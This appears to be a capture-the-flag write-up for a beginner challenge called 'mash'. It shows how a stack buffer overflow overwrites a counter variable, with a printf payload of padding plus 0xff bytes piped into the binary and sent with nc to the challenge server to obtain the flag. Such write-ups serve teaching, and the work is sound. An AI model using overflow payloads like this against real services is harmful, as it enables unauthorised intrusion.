# mash

For this challenge we are given a simple binary that outputs something like this:

```
HOW FAST CAN YOU PRESS ENTER???
PRESS ENTER TO COUNT UP, FLAG WHEN CURRENT COUNT == 0xffffffffffffffff
CURRENT COUNT: 0000000000000000
```

We can press enter to increment the current count by one. However, when we type something besides a blank line before pressing enter, something weird happens to the current count:

```
HOW FAST CAN YOU PRESS ENTER???
PRESS ENTER TO COUNT UP, FLAG WHEN CURRENT COUNT == 0xffffffffffffffff
CURRENT COUNT: 0000000000000000
AAAAAAAAAAAAAAAAAAAAAAAAAAA
PRESS ENTER TO COUNT UP, FLAG WHEN CURRENT COUNT == 0xffffffffffffffff
CURRENT COUNT: 0x0000000a414141
```

So we have a memory corruption bug that will allow us to overwrite the current count with whatever we want! We can't type `0xff` characters with the keyboard though, so let's try using the printf command with a pipe to the binary:

```
$ printf 'AAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff' | ./mash
HOW FAST CAN YOU PRESS ENTER???
PRESS ENTER TO COUNT UP, FLAG WHEN CURRENT COUNT == 0xffffffffffffffff
CURRENT COUNT: 0000000000000000

$
```

The program ends, so we must have passed the check. Let's try it on the server!

```
$ printf 'AAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff' | nc ctf.ropcity.com 1337
HOW FAST CAN YOU PRESS ENTER???
PRESS ENTER TO COUNT UP, FLAG WHEN CURRENT COUNT == 0xffffffffffffffff
CURRENT COUNT: 0000000000000000
osu{n3xt_1evel_butt0N_maSh1ng}
```
